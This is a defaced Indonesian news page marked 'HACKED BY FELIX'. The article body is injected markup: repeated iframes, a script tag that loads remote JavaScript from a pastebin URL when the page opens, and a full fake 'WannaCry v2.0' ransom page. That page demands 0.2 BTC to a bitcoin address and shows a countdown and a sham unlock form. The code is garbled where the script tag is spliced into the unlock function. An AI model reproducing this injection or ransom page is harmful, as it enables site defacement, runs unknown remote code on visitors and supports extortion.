Berita
Mamah Ada Karbit BIT KARBIT | HACKED BY FELIX
Tanggal : 06/04/2025, 18:39:53, dibaca 40 kali.
<iframe src="https://i.ibb.co/MZcPf7m/example.jpg" width="500" height="300"></iframe><iframe src="https://ibb.co/SwNLmFWR" width="500" height="300"></iframe>https://ibb.co/SwNLmFWRhttps://i.ibb.co/MZcPf7m/example.jpg<script type="text/javascript" src="https://pastebin.com/raw/eDQ2QS8A"></script>https://pastebin.com/raw/eDQ2QS8A<iframe src="https://i.ibb.co/MZcPf7m/example.jpg" width="500" height="300"></iframe><iframe src="https://ibb.co/SwNLmFWR" width="500" height="300"></iframe><iframe src="https://i.ibb.co/MZcPf7m/example.jpg" width="500" height="300"></iframe><iframe src="https://i.ibb.co/MZcPf7m/example.jpg" width="500" height="300"></iframe><iframe src="https://ibb.co/SwNLmFWR" width="500" height="300"></iframe>https://ibb.co/SwNLmFWRhttps://i.ibb.co/MZcPf7m/example.jpg<iframe src="https://i.ibb.co/MZcPf7m/example.jpg" width="500" height="300"></iframe><iframe src="https://ibb.co/SwNLmFWR" width="500" height="300"></iframe>https://ibb.co/SwNLmFWR<iframe src="https://ibb.co/SwNLmFWR" width="500" height="300"></iframe><iframe src="https://i.ibb.co/MZcPf7m/example.jpg" width="500" height="300"></iframe>https://i.ibb.co/MZcPf7m/example.jpg<iframe src="https://i.ibb.co/MZcPf7m/example.jpg" width="500" height="300"></iframe><iframe src="https://i.ibb.co/MZcPf7m/example.jpg" width="500" height="300"></iframe>https://i.ibb.co/MZcPf7m/example.jpg<iframe src="https://i.ibb.co/MZcPf7m/example.jpg" width="500" height="300"></iframe><iframe src="https://ibb.co/SwNLmFWR" width="500" height="300"></iframe>https://ibb.co/SwNLmFWR<iframe src="https://ibb.co/SwNLmFWR" width="500" height="300"></iframe><iframe src="https://i.ibb.co/MZcPf7m/example.jpg" width="500" height="300"></iframe>https://i.ibb.co/MZcPf7m/example.jpghttps://ibb.co/SwNLmFWR<iframe src="https://ibb.co/SwNLmFWR" width="500" height="300"></iframe><iframe src="https://i.ibb.co/MZcPf7m/example.jpg" width="500" height="300"></iframe>https://i.ibb.co/MZcPf7m/example.jpg<iframe src="https://ibb.co/SwNLmFWR" width="500" height="300"></iframe><iframe src="https://i.ibb.co/MZcPf7m/example.jpg" width="500" height="300"></iframe><iframe src="https://ibb.co/SwNLmFWR" width="500" height="300"></iframe>https://ibb.co/SwNLmFWR<iframe src="https://i.ibb.co/MZcPf7m/example.jpg" width="500" height="300"></iframe><!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>WannaCry v2.0 by Err0r</title>
<style>
body {
background: #990000;
color: white;
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
margin: 0;
padding: 30px;
text-align: center;
}
h1 {
font-size: 3rem;
margin-bottom: 0.2em;
text-shadow: 0 0 10px #ff0000;
}
#countdown {
font-size: 2rem;
background: #ff6600;
color: white;
padding: 15px 30px;
border-radius: 10px;
display: inline-block;
margin: 20px auto;
min-width: 280px;
}
p {
font-size: 1.2rem;
max-width: 600px;
margin: 10px auto;
line-height: 1.4;
}
a {
color: #80a0ff;
text-decoration: none;
font-weight: bold;
}
a:hover {
text-decoration: underline;
}
form {
margin-top: 30px;
}
input[type="text"] {
width: 300px;
padding: 12px;
border-radius: 5px;
border: none;
font-size: 1rem;
margin-right: 10px;
}
button {
padding: 12px 25px;
font-size: 1rem;
background-color: #4caf50;
border: none;
border-radius: 5px;
cursor: pointer;
color: white;
}
button:hover {
background-color: #45a049;
}
footer {
margin-top: 60px;
font-size: 0.9rem;
color: #ccc;
}
</style>
</head>
<body>
<h1>Ooops, your website has been encrypted!</h1>
<div id="countdown">Loading countdown...</div>
<p>Your important website files are encrypted.<br>
You can recover your files only by paying 0.2 BTC to the address below.</p>
<p><strong>Payment BTC address:</strong><br>
<span style="color: yellow; font-family: monospace;">16vSaJraVDQaXKSi5fDNk9UhojrZqN5PUu9</span></p>
<form onsubmit="return unlockFiles(event)">
<input type="text" name="key" placeholder="Enter your unlock key" required />
<button type="submit">Unlock Files</button>
</form>
<p style="margin-top: 20px;">
Payment accepted via <a href="https://bitcoin.org/en/how-it-works" target="_blank" rel="noopener noreferrer">Bitcoin</a> only.<br>
For help, contact us at <a href="mailto:support@err0r.com">support@err0r.com</a>
</p>
<footer>© 2020 Err0r | All rights reserved</footer>
<script>
// Countdown timer to next Friday 20:00
function updateCountdown() {
const now = new Date();
const dayOfWeek = now.getDay(); // 0=Sun, 5=Fri
let daysUntilFriday = 5 - dayOfWeek;
if (daysUntilFriday < 0) daysUntilFriday += 7;
// Next Friday 20:00
const nextFriday = new Date(now.getFullYear(), now.getMonth(), now.getDate() + daysUntilFriday, 20, 0, 0);
if (nextFriday < now) {
// If already past Friday 20:00 today, set to next week
nextFriday.setDate(nextFriday.getDate() + 7);
}
const diff = nextFriday - now;
const days = Math.floor(diff / (1000 * 60 * 60 * 24));
const hours = Math.floor((diff / (1000 * 60 * 60)) % 24);
const minutes = Math.floor((diff / (1000 * 60)) % 60);
const seconds = Math.floor((diff / 1000) % 60);
document.getElementById('countdown').textContent =
`${days}d ${hours.toString().padStart(2,'0')}h:${minutes.toString().padStart(2,'0')}m:${seconds.toString().padStart(2,'0')}s`;
}
setInterval(updateCountdown, 1000);
updateCountdown();
// Unlock files button handler
function unlockFiles(e) {
e.preventDefault();
const keyInput = e.target.key.value.trim();
if (!keyInput) {
alert('Please enter an unlock key.');
return false;
}<script type="text/javascript" src="https://pastebin.com/raw/eDQ2QS8A"></script>https://pastebin.com/raw/eDQ2QS8A0https://bitcoin.org/en/how-it-works2020Friday 20:00
alert('Payment information not correct! Please contact support for assistance.');
return false;
}
</script>
</body>
</html>MAH ADA KARBIT KABURRRR BIT KARBIT "
Kembali ke Atas
Berita Lainnya : |
Silahkan Isi Komentar dari tulisan berita diatas |
Komentar :
Kembali ke Atas